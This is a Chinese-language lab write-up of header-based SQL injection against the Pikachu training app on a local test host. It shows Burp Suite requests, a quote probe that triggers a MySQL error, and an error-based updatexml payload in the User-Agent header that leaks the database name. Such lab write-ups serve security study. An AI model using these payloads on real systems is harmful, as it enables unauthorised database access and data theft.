pikachu sql inject header 注入

使用admin登录

显示以下内容

朋友，你好，你的信息已经被记录了：点击退出

你的ip地址:172.17.0.1

你的user agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0

你的http accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

你的端口（本次连接）:tcp52654

burpsuite 抓包，请求报文为

GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.9:8080/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1

推测user-agent和 accept 为注入点，将请求发给repeater

在 user-agent和 accept 加入一个', 点击send

果然报错：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '52672')' at line 1

说明这里存在注入点

将user-agent 改为

1' or updatexml(1,concat(0x7e,database()),0) or '

请求报文变为：

GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.1.9:8080
User-Agent: 1' or updatexml(1,concat(0x7e,database()),0) or '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.9:8080/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; security=high; PHPSESSID=fftr9buiig10nl6bda5f22li59
Upgrade-Insecure-Requests: 1

爆出库名

XPATH syntax error: '~pikachu'